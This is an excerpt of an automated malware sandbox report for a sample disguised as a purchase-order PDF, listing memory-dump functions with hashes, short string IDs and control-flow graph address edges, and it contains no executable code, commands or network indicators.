                                            • Instruction Fuzzy Hash: 5632C2B4A112298FCB65DF28C994A99BBF6FF48301F1091E9E54DA7351DB30AE81CF44
                                            Function 061FA63B Relevance: .3, Instructions: 302COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766207440.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_61f0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 475b97c2ead78242412b982f4d98818ef9864f762cbc3d9da3d13e42559b0147
                                            • Instruction ID: c40f39a51eecd2d5572a0506e028dc038a031300dc332c79ce4538e2da4968a0
                                            • Opcode Fuzzy Hash: 475b97c2ead78242412b982f4d98818ef9864f762cbc3d9da3d13e42559b0147
                                            • Instruction Fuzzy Hash: 33D11274A11218CFDB94DFA8D954BAEBBF1FF48314F10806AE919A7794DB385984CF80
                                            Function 061FA648 Relevance: .3, Instructions: 298COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766207440.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_61f0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4d3bfdfe2d67569ed2cb618d6893a071005f9200609ea7bc01529b322b28f728
                                            • Instruction ID: 2a1118e4f3248c16c9cc7749108ee4e25b93ccd1baab518f1ea1b9ea71ebca56
                                            • Opcode Fuzzy Hash: 4d3bfdfe2d67569ed2cb618d6893a071005f9200609ea7bc01529b322b28f728
                                            • Instruction Fuzzy Hash: 6DD10174A11218CFDB94DFA8D954BAEBBF1FF48314F10806AE919A7354DB385984CF80
                                            Function 06215303 Relevance: .2, Instructions: 236COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766300402.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6210000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: eacb54f290e86ae0f540397eb08d86270963297186f8e67666ce77c518ff83dc
                                            • Instruction ID: ba329a0b6a94e969f669f56efa2623bb36dff60468cd8ff7a8b0b13c25cbcff0
                                            • Opcode Fuzzy Hash: eacb54f290e86ae0f540397eb08d86270963297186f8e67666ce77c518ff83dc
                                            • Instruction Fuzzy Hash: 83B13AB4E25218CFDB54DFA5D854BADB7F2FB88304F5080A9D409BB245DB346985CF11
                                            Function 0621D1A3 Relevance: .2, Instructions: 177COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766300402.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6210000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0a4ca2f7071b8944655f044b83cec6711302743c844b13e0e4f991aa68cf8d04
                                            • Instruction ID: b4191a0853312d9496c6600cf05efb96f9a6235689131a23c706c622c70076e5
                                            • Opcode Fuzzy Hash: 0a4ca2f7071b8944655f044b83cec6711302743c844b13e0e4f991aa68cf8d04
                                            • Instruction Fuzzy Hash: B77120B4E11209DFDB44DFA9D554AAEBBF6FF88300F108429E909AB354DB349945CF50
                                            Function 0621D1A8 Relevance: .2, Instructions: 177COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766300402.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6210000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c94e6fd9bef9d6c657ce4ef38b13241ff1b1b7439b7604f677f5a42f08ca269a
                                            • Instruction ID: a8c453179f1e84cc3f282f22e09959102caa7a2d02a236679676428a356aaa79
                                            • Opcode Fuzzy Hash: c94e6fd9bef9d6c657ce4ef38b13241ff1b1b7439b7604f677f5a42f08ca269a
                                            • Instruction Fuzzy Hash: B2714EB0E11209DFDB44DFA9D590AAEBBF6FF88300F108429E909AB354DB349945CF90
                                            Function 0621D199 Relevance: .2, Instructions: 172COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766300402.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6210000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6d1d3168ac022d9e7f5131fc46ecdc748a867c340517a29a8f2f7553fce87e70
                                            • Instruction ID: c7eb53f519d710e4921b6150bb5452f56c12cb12d120e32ceb851ad0ba16b897
                                            • Opcode Fuzzy Hash: 6d1d3168ac022d9e7f5131fc46ecdc748a867c340517a29a8f2f7553fce87e70
                                            • Instruction Fuzzy Hash: 00712AB4E11209DFDB44DFA9D990AAEBBF2FF88300F508429E809AB354DB349945CF50
                                            Function 01182728 Relevance: .1, Instructions: 135COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1753535503.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_1180000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 98146aa29a6bbbffd7b9d1ebb76455ec41803890d012b605cad493c6e48ad5b2
                                            • Instruction ID: 39ea6359b56ccbd12c0f592d08714cfe5abd68ae610f77e9847b099801bd9a75
                                            • Opcode Fuzzy Hash: 98146aa29a6bbbffd7b9d1ebb76455ec41803890d012b605cad493c6e48ad5b2
                                            • Instruction Fuzzy Hash: 40514871D016688BEB6CCF6B8D457DAFAF3AFC9300F04C0EA954CA6254DB700AC58E11
                                            Function 05F262F0 Relevance: 4.2, Strings: 3, Instructions: 480COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 800 5f262f0-5f26318 802 5f26366-5f26374 800->802 803 5f2631a-5f26361 800->803 804 5f26383 802->804 805 5f26376-5f26381 call 5f23e10 802->805 850 5f267bd-5f267c4 803->850 807 5f26385-5f2638c 804->807 805->807 810 5f26392-5f26396 807->810 811 5f26475-5f26479 807->811 812 5f267c5-5f267ed 810->812 813 5f2639c-5f263a0 810->813 815 5f2647b-5f2648a call 5f22028 811->815 816 5f264cf-5f264d9 811->816 824 5f267f4-5f2681e 812->824 817 5f263b2-5f26410 call 5f23b50 call 5f245b8 813->817 818 5f263a2-5f263ac 813->818 828 5f2648e-5f26493 815->828 819 5f26512-5f26538 816->819 820 5f264db-5f264ea call 5f21748 816->820 860 5f26883-5f268ad 817->860 861 5f26416-5f26470 817->861 818->817 818->824 844 5f26545 819->844 845 5f2653a-5f26543 819->845 837 5f264f0-5f2650d 820->837 838 5f26826-5f2683c 820->838 824->838 832 5f26495-5f264ca call 5f25db8 828->832 833 5f2648c 828->833 832->850 833->828 837->850 863 5f26844-5f2687c 838->863 852 5f26547-5f2656f 844->852 845->852 868 5f26640-5f26644 852->868 869 5f26575-5f2658e 852->869 870 5f268b7-5f268bd 860->870 871 5f268af-5f268b5 860->871 861->850 863->860 872 5f26646-5f2665f 868->872 873 5f266be-5f266c8 868->873 869->868 890 5f26594-5f265a3 call 5f21170 869->890 871->870 878 5f268be-5f268fb 871->878 872->873 896 5f26661-5f26670 call 5f21170 872->896 875 5f26725-5f2672e 873->875 876 5f266ca-5f266d4 873->876 880 5f26730-5f2675e call 5f23360 call 5f23380 875->880 881 5f26766-5f267b3 875->881 891 5f266d6-5f266d8 876->891 892 5f266da-5f266ec 876->892 880->881 901 5f267bb 881->901 909 5f265a5-5f265ab 890->909 910 5f265bb-5f265d0 890->910 898 5f266ee-5f266f0 891->898 892->898 916 5f26672-5f26678 896->916 917 5f26688-5f26693 896->917 906 5f266f2-5f266f6 898->906 907 5f2671e-5f26723 898->907 901->850 912 5f26714-5f26717 906->912 913 5f266f8-5f26711 906->913 907->875 907->876 918 5f265af-5f265b1 909->918 919 5f265ad 909->919 922 5f265d2-5f265fe call 5f224b0 910->922 923 5f26604-5f2660d 910->923 912->907 913->912 926 5f2667a 916->926 927 5f2667c-5f2667e 916->927 917->860 928 5f26699-5f266bc 917->928 918->910 919->910 922->863 922->923 923->860 925 5f26613-5f2663a 923->925 925->868 925->890 926->917 927->917 928->873 928->896
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765592756.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f20000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Hbq$Hbq$Hbq
                                            • API String ID: 0-2297679979
                                            • Opcode ID: 49c8f7ce199361fa10246edf4afbe0be5bea130bee3e6ec54aed385bd2de8736
                                            • Instruction ID: 3dc132fef5c51e498791c601ec5e13958ae3e3e94cb6109fecbbf43897df5e0a
                                            • Opcode Fuzzy Hash: 49c8f7ce199361fa10246edf4afbe0be5bea130bee3e6ec54aed385bd2de8736
                                            • Instruction Fuzzy Hash: 0C124CB5A002148FDB24DFA5D895A6EBBF2FF88300F148929E446DB355DF39AC45CB90
                                            Function 05F27FA8 Relevance: 4.1, Strings: 3, Instructions: 370COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 941 5f27fa8-5f27fe5 943 5f28007-5f2801d call 5f27db0 941->943 944 5f27fe7-5f27fea 941->944 950 5f28393-5f283a7 943->950 951 5f28023-5f2802f 943->951 1056 5f27fec call 5f288c0 944->1056 1057 5f27fec call 5f288b0 944->1057 1058 5f27fec call 5f28918 944->1058 1059 5f27fec call 5f28908 944->1059 947 5f27ff2-5f27ff4 947->943 948 5f27ff6-5f27ffe 947->948 948->943 958 5f283e7-5f283f0 950->958 952 5f28160-5f28167 951->952 953 5f28035-5f28038 951->953 956 5f28296-5f282d0 call 5f277b8 952->956 957 5f2816d-5f28176 952->957 955 5f2803b-5f28044 953->955 960 5f2804a-5f2805e 955->960 961 5f28488 955->961 1054 5f282d3 call 5f2a750 956->1054 1055 5f282d3 call 5f2a741 956->1055 957->956 962 5f2817c-5f28288 call 5f277b8 call 5f27d48 call 5f277b8 957->962 965 5f283f2-5f283f9 958->965 966 5f283b5-5f283be 958->966 978 5f28150-5f2815a 960->978 979 5f28064-5f280f9 call 5f27db0 * 2 call 5f277b8 call 5f27d48 call 5f27df0 call 5f27e98 call 5f27f00 960->979 964 5f2848d-5f28491 961->964 1052 5f28293 962->1052 1053 5f2828a 962->1053 972 5f28493 964->972 973 5f2849c 964->973 968 5f28447-5f2844e 965->968 969 5f283fb-5f2843e call 5f277b8 965->969 966->961 971 5f283c4-5f283d6 966->971 974 5f28473-5f28486 968->974 975 5f28450-5f28460 968->975 969->968 988 5f283e6 971->988 989 5f283d8-5f283dd 971->989 972->973 980 5f2849d 973->980 974->964 975->974 991 5f28462-5f2846a 975->991 978->952 978->955 1031 5f280fb-5f28113 call 5f27e98 call 5f277b8 call 5f27a68 979->1031 1032 5f28118-5f2814b call 5f27f00 979->1032 980->980 988->958 1060 5f283e0 call 5f2aee2 989->1060 1061 5f283e0 call 5f2aef0 989->1061 991->974 1001 5f282d9-5f2838a call 5f277b8 1001->950 1031->1032 1032->978 1052->956 1053->1052 1054->1001 1055->1001 1056->947 1057->947 1058->947 1059->947 1060->988 1061->988
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765592756.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f20000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$4'^q
                                            • API String ID: 0-1196845430
                                            • Opcode ID: 82862fa184c597b884145ae884945c9176a104dba036572e61b6c1ffa80dc7a3
                                            • Instruction ID: 6563fddf190efe9d5c65023db2e88400a8d27e1a83ac0ec206005f58ba6cee22
                                            • Opcode Fuzzy Hash: 82862fa184c597b884145ae884945c9176a104dba036572e61b6c1ffa80dc7a3
                                            • Instruction Fuzzy Hash: 87F1EB74B10218CFDB08EFA4D999A9DBBB2FF88340F558154E506AB365DB34EC42CB90
                                            Function 05F2C580 Relevance: 4.1, Strings: 3, Instructions: 362COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1062 5f2c580-5f2c590 1063 5f2c596-5f2c59a 1062->1063 1064 5f2c6a9-5f2c6ce 1062->1064 1065 5f2c5a0-5f2c5a9 1063->1065 1066 5f2c6d5-5f2c6fa 1063->1066 1064->1066 1067 5f2c701-5f2c737 1065->1067 1068 5f2c5af-5f2c5d6 1065->1068 1066->1067 1086 5f2c73e-5f2c750 1067->1086 1079 5f2c69e-5f2c6a8 1068->1079 1080 5f2c5dc-5f2c5de 1068->1080 1082 5f2c5e0-5f2c5e3 1080->1082 1083 5f2c5ff-5f2c601 1080->1083 1085 5f2c5e9-5f2c5f3 1082->1085 1082->1086 1084 5f2c604-5f2c608 1083->1084 1087 5f2c60a-5f2c619 1084->1087 1088 5f2c669-5f2c675 1084->1088 1085->1086 1090 5f2c5f9-5f2c5fd 1085->1090 1094 5f2c752-5f2c785 1086->1094 1095 5f2c788-5f2c794 1086->1095 1087->1086 1097 5f2c61f-5f2c666 1087->1097 1088->1086 1091 5f2c67b-5f2c698 1088->1091 1090->1083 1090->1084 1091->1079 1091->1080 1094->1095 1102 5f2c796-5f2c7aa 1095->1102 1103 5f2c7b8-5f2c7cf 1095->1103 1097->1088 1178 5f2c7ad call 5f2cd70 1102->1178 1179 5f2c7ad call 5f2cdf8 1102->1179 1180 5f2c7ad call 5f2cd6e 1102->1180 1110 5f2c8c0-5f2c8d0 1103->1110 1111 5f2c7d5-5f2c8bb call 5f27db0 call 5f277b8 * 2 call 5f27df0 call 5f2b5b8 call 5f277b8 call 5f2a750 call 5f28658 1103->1111 1109 5f2c7b3 1112 5f2c9e3-5f2c9ee 1109->1112 1121 5f2c8d6-5f2c9b0 call 5f27db0 * 2 call 5f28568 call 5f277b8 * 2 call 5f27a68 call 5f27f00 call 5f277b8 1110->1121 1122 5f2c9be-5f2c9da call 5f277b8 1110->1122 1111->1110 1118 5f2c9f0-5f2ca00 1112->1118 1119 5f2ca1d-5f2ca3e call 5f27f00 1112->1119 1132 5f2ca02-5f2ca08 1118->1132 1133 5f2ca10-5f2ca18 call 5f28658 1118->1133 1175 5f2c9b2 1121->1175 1176 5f2c9bb 1121->1176 1122->1112 1132->1133 1133->1119 1175->1176 1176->1122 1178->1109 1179->1109 1180->1109
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765592756.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f20000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (bq$(bq$Hbq
                                            • API String ID: 0-2835675688
                                            • Opcode ID: cbd502b0b52cd04b9a69994760442cea78c55c2842e7a7ff355d16a05f506451
                                            • Instruction ID: cde44d5c6e4c9a0d093b9aa8566240701b73b840230f43319c83e22b2a157a5c
                                            • Opcode Fuzzy Hash: cbd502b0b52cd04b9a69994760442cea78c55c2842e7a7ff355d16a05f506451
                                            • Instruction Fuzzy Hash: 87E12F74A01219DFCB04EF64D4959ADBBB2FF89310F508569E806AB364DF38ED42CB91
                                            Function 05F10D98 Relevance: 3.1, Strings: 2, Instructions: 577COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765563723.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f10000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q
                                            • API String ID: 0-2697143702
                                            • Opcode ID: 02a952d4a8db2ccc25d0a6fa45a5b8fa6962e504e7a5ca32b1d08205e89a517c
                                            • Instruction ID: 8ed7b2201f7898567ff0469a317681729e95983d302fb8e7451bf6fb7354df13
                                            • Opcode Fuzzy Hash: 02a952d4a8db2ccc25d0a6fa45a5b8fa6962e504e7a5ca32b1d08205e89a517c
                                            • Instruction Fuzzy Hash: 3B42D378E0420DCFDB14DBA5D499ABEBBB6FF49301F108019EA16AB254CB3C5982CF55
                                            Function 05F22859 Relevance: 3.0, Strings: 2, Instructions: 484COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1502 5f22859-5f22894 1504 5f22896 1502->1504 1505 5f2289d-5f228b0 call 5f224e8 1502->1505 1504->1505 1508 5f228b6-5f228c9 1505->1508 1509 5f229f4-5f229fb 1505->1509 1515 5f228d7-5f228f1 1508->1515 1516 5f228cb-5f228d2 1508->1516 1510 5f22a01-5f22a16 1509->1510 1511 5f22c95-5f22c9c 1509->1511 1522 5f22a36-5f22a3c 1510->1522 1523 5f22a18-5f22a1a 1510->1523 1513 5f22d0b-5f22d12 1511->1513 1514 5f22c9e-5f22ca7 1511->1514 1518 5f22d18-5f22d21 1513->1518 1519 5f22dae-5f22db5 1513->1519 1514->1513 1520 5f22ca9-5f22cbc 1514->1520 1540 5f228f3-5f228f6 1515->1540 1541 5f228f8-5f22905 1515->1541 1521 5f229ed 1516->1521 1518->1519 1524 5f22d27-5f22d3a 1518->1524 1525 5f22dd1-5f22dd7 1519->1525 1526 5f22db7-5f22dc8 1519->1526 1520->1513 1542 5f22cbe-5f22d03 1520->1542 1521->1509 1530 5f22a42-5f22a44 1522->1530 1531 5f22b04-5f22b08 1522->1531 1523->1522 1529 5f22a1c-5f22a33 1523->1529 1546 5f22d3c-5f22d4b 1524->1546 1547 5f22d4d-5f22d51 1524->1547 1527 5f22de9-5f22df2 1525->1527 1528 5f22dd9-5f22ddf 1525->1528 1526->1525 1548 5f22dca 1526->1548 1534 5f22de1-5f22de7 1528->1534 1535 5f22df5-5f22e6a 1528->1535 1529->1522 1530->1531 1539 5f22a4a-5f22a53 1530->1539 1531->1511 1536 5f22b0e-5f22b10 1531->1536 1534->1527 1534->1535 1613 5f22e78 1535->1613 1614 5f22e6c-5f22e76 1535->1614 1536->1511 1544 5f22b16-5f22b1f 1536->1544 1643 5f22a55 call 5f22f87 1539->1643 1644 5f22a55 call 5f22f98 1539->1644 1543 5f22907-5f2291b 1540->1543 1541->1543 1542->1513 1577 5f22d05-5f22d08 1542->1577 1543->1521 1575 5f22921-5f22975 1543->1575 1554 5f22c72-5f22c78 1544->1554 1546->1547 1549 5f22d53-5f22d55 1547->1549 1550 5f22d71-5f22d73 1547->1550 1548->1525 1549->1550 1556 5f22d57-5f22d6e 1549->1556 1550->1519 1557 5f22d75-5f22d7b 1550->1557 1551 5f22a5b-5f22acb 1604 5f22ae2-5f22b01 1551->1604 1605 5f22acd-5f22adf 1551->1605 1559 5f22c7a-5f22c89 1554->1559 1560 5f22c8b 1554->1560 1556->1550 1557->1519 1565 5f22d7d-5f22dab 1557->1565 1562 5f22c8d-5f22c8f 1559->1562 1560->1562 1562->1511 1569 5f22b24-5f22b32 call 5f21170 1562->1569 1565->1519 1579 5f22b34-5f22b3a 1569->1579 1580 5f22b4a-5f22b64 1569->1580 1609 5f22983-5f22987 1575->1609 1610 5f22977-5f22979 1575->1610 1577->1513 1584 5f22b3e-5f22b40 1579->1584 1585 5f22b3c 1579->1585 1580->1554 1590 5f22b6a-5f22b6e 1580->1590 1584->1580 1585->1580 1593 5f22b70-5f22b79 1590->1593 1594 5f22b8f 1590->1594 1597 5f22b80-5f22b83 1593->1597 1598 5f22b7b-5f22b7e 1593->1598 1596 5f22b92-5f22bac 1594->1596 1596->1554 1616 5f22bb2-5f22c33 1596->1616 1599 5f22b8d 1597->1599 1598->1599 1599->1596 1604->1531 1605->1604 1609->1521 1615 5f22989-5f229a1 1609->1615 1610->1609 1617 5f22e7d-5f22e7f 1613->1617 1614->1617 1615->1521 1623 5f229a3-5f229af 1615->1623 1639 5f22c35-5f22c47 1616->1639 1640 5f22c4a-5f22c70 1616->1640 1618 5f22e81-5f22e84 1617->1618 1619 5f22e86-5f22e8b 1617->1619 1622 5f22e91-5f22ebe 1618->1622 1619->1622 1625 5f229b1-5f229b4 1623->1625 1626 5f229be-5f229c4 1623->1626 1625->1626 1628 5f229c6-5f229c9 1626->1628 1629 5f229cc-5f229d5 1626->1629 1628->1629 1631 5f229d7-5f229da 1629->1631 1632 5f229e4-5f229ea 1629->1632 1631->1632 1632->1521 1639->1640 1640->1511 1640->1554 1643->1551 1644->1551
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765592756.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f20000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $^q$$^q
                                            • API String ID: 0-355816377
                                            • Opcode ID: aa50f00e53c47b6b5e5652e69c4ea7cfc3f4f55ffcf88a0818c634fda46603e5
                                            • Instruction ID: 8e27a969d8c92680bac00fcac9d77d25bc91c6545fb543b8d260fb32a9c37973
                                            • Opcode Fuzzy Hash: aa50f00e53c47b6b5e5652e69c4ea7cfc3f4f55ffcf88a0818c634fda46603e5
                                            • Instruction Fuzzy Hash: 6212AE74E002298FDB15DFA5C995AFDBBB2FF88304F108415E852AB398DB789946CF50
                                            Function 05F118C0 Relevance: 2.9, Strings: 2, Instructions: 362COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1645 5f118c0-5f118e8 1646 5f118ea 1645->1646 1647 5f118ef-5f11918 1645->1647 1646->1647 1648 5f11939 1647->1648 1649 5f1191a-5f11923 1647->1649 1652 5f1193c-5f11940 1648->1652 1650 5f11925-5f11928 1649->1650 1651 5f1192a-5f1192d 1649->1651 1653 5f11937 1650->1653 1651->1653 1654 5f11cf7-5f11d0e 1652->1654 1653->1652 1656 5f11945-5f11949 1654->1656 1657 5f11d14-5f11d18 1654->1657 1660 5f1194b-5f119a8 1656->1660 1661 5f1194e-5f11952 1656->1661 1658 5f11d1a-5f11d4a 1657->1658 1659 5f11d4d-5f11d51 1657->1659 1658->1659 1665 5f11d53-5f11d5c 1659->1665 1666 5f11d72 1659->1666 1669 5f119aa-5f11a1b 1660->1669 1670 5f119ad-5f119b1 1660->1670 1663 5f11954-5f11961 1661->1663 1664 5f1197b-5f1199f 1661->1664 1682 5f1196a-5f11978 1663->1682 1664->1654 1671 5f11d63-5f11d66 1665->1671 1672 5f11d5e-5f11d61 1665->1672 1667 5f11d75-5f11d7b 1666->1667 1680 5f11a20-5f11a24 1669->1680 1681 5f11a1d-5f11a7a 1669->1681 1676 5f119b3-5f119d7 1670->1676 1677 5f119da-5f11a01 1670->1677 1673 5f11d70 1671->1673 1672->1673 1673->1667 1676->1677 1700 5f11a11-5f11a12 1677->1700 1701 5f11a03-5f11a09 1677->1701 1686 5f11a26-5f11a4a 1680->1686 1687 5f11a4d-5f11a71 1680->1687 1689 5f11a7c-5f11ad8 1681->1689 1690 5f11a7f-5f11a83 1681->1690 1682->1664 1686->1687 1687->1654 1702 5f11ada-5f11b3c 1689->1702 1703 5f11add-5f11ae1 1689->1703 1698 5f11a85-5f11aa9 1690->1698 1699 5f11aac-5f11acf 1690->1699 1698->1699 1699->1654 1700->1654 1701->1700 1712 5f11b41-5f11b45 1702->1712 1713 5f11b3e-5f11ba0 1702->1713 1709 5f11ae3-5f11b07 1703->1709 1710 5f11b0a-5f11b22 1703->1710 1709->1710 1722 5f11b32-5f11b33 1710->1722 1723 5f11b24-5f11b2a 1710->1723 1719 5f11b47-5f11b6b 1712->1719 1720 5f11b6e-5f11b86 1712->1720 1724 5f11ba2-5f11c04 1713->1724 1725 5f11ba5-5f11ba9 1713->1725 1719->1720 1733 5f11b96-5f11b97 1720->1733 1734 5f11b88-5f11b8e 1720->1734 1722->1654 1723->1722 1735 5f11c06-5f11c68 1724->1735 1736 5f11c09-5f11c0d 1724->1736 1730 5f11bd2-5f11bea 1725->1730 1731 5f11bab-5f11bcf 1725->1731 1744 5f11bfa-5f11bfb 1730->1744 1745 5f11bec-5f11bf2 1730->1745 1731->1730 1733->1654 1734->1733 1746 5f11c6a-5f11cc3 1735->1746 1747 5f11c6d-5f11c71 1735->1747 1741 5f11c36-5f11c4e 1736->1741 1742 5f11c0f-5f11c33 1736->1742 1755 5f11c50-5f11c56 1741->1755 1756 5f11c5e-5f11c5f 1741->1756 1742->1741 1744->1654 1745->1744 1757 5f11cc5-5f11ce9 1746->1757 1758 5f11cec-5f11cef 1746->1758 1752 5f11c73-5f11c97 1747->1752 1753 5f11c9a-5f11cbd 1747->1753 1752->1753 1753->1654 1755->1756 1756->1654 1757->1758 1758->1654
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765563723.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f10000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q
                                            • API String ID: 0-2697143702
                                            • Opcode ID: e01f3554be336a1915b20bc684eb2aa6ae477a0fa24d9f97ca18bfbd593afbb8
                                            • Instruction ID: 895bc6b37b40186f7adf02f6b22a8f17a1b97b6372dba182ded5a43e6230aec4
                                            • Opcode Fuzzy Hash: e01f3554be336a1915b20bc684eb2aa6ae477a0fa24d9f97ca18bfbd593afbb8
                                            • Instruction Fuzzy Hash: EBF1D234D0621CDFDB28EFA4E595AACBBB3FF89315F604029E906A7250DB395985CF04
                                            Function 05F259A0 Relevance: 2.8, Strings: 2, Instructions: 340COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1770 5f259a0-5f259b2 1771 5f259b4-5f259d5 1770->1771 1772 5f259dc-5f259e0 1770->1772 1771->1772 1773 5f259e2-5f259e4 1772->1773 1774 5f259ec-5f259fb 1772->1774 1773->1774 1775 5f25a07-5f25a33 1774->1775 1776 5f259fd 1774->1776 1780 5f25c60-5f25ca7 1775->1780 1781 5f25a39-5f25a3f 1775->1781 1776->1775 1812 5f25ca9 1780->1812 1813 5f25cbd-5f25cc9 1780->1813 1783 5f25b11-5f25b15 1781->1783 1784 5f25a45-5f25a4b 1781->1784 1785 5f25b17-5f25b20 1783->1785 1786 5f25b38-5f25b41 1783->1786 1784->1780 1788 5f25a51-5f25a5e 1784->1788 1785->1780 1789 5f25b26-5f25b36 1785->1789 1790 5f25b43-5f25b63 1786->1790 1791 5f25b66-5f25b69 1786->1791 1792 5f25af0-5f25af9 1788->1792 1793 5f25a64-5f25a6d 1788->1793 1795 5f25b6c-5f25b72 1789->1795 1790->1791 1791->1795 1792->1780 1797 5f25aff-5f25b0b 1792->1797 1793->1780 1794 5f25a73-5f25a8b 1793->1794 1798 5f25a97-5f25aa9 1794->1798 1799 5f25a8d 1794->1799 1795->1780 1801 5f25b78-5f25b8b 1795->1801 1797->1783 1797->1784 1798->1792 1807 5f25aab-5f25ab1 1798->1807 1799->1798 1801->1780 1803 5f25b91-5f25ba1 1801->1803 1803->1780 1806 5f25ba7-5f25bb4 1803->1806 1806->1780 1809 5f25bba-5f25bcf 1806->1809 1810 5f25ab3 1807->1810 1811 5f25abd-5f25ac3 1807->1811 1809->1780 1819 5f25bd5-5f25bf8 1809->1819 1810->1811 1811->1780 1816 5f25ac9-5f25aed 1811->1816 1817 5f25cac-5f25cae 1812->1817 1814 5f25cd5-5f25cf1 1813->1814 1815 5f25ccb 1813->1815 1815->1814 1820 5f25cf2-5f25d1f call 5f21170 1817->1820 1821 5f25cb0-5f25cbb 1817->1821 1819->1780 1826 5f25bfa-5f25c05 1819->1826 1832 5f25d21-5f25d27 1820->1832 1833 5f25d37-5f25d39 1820->1833 1821->1813 1821->1817 1829 5f25c56-5f25c5d 1826->1829 1830 5f25c07-5f25c11 1826->1830 1830->1829 1838 5f25c13-5f25c29 1830->1838 1835 5f25d2b-5f25d2d 1832->1835 1836 5f25d29 1832->1836 1856 5f25d3b call 5f26f78 1833->1856 1857 5f25d3b call 5f25db8 1833->1857 1858 5f25d3b call 5f25da8 1833->1858 1835->1833 1836->1833 1837 5f25d41-5f25d45 1839 5f25d90-5f25da0 1837->1839 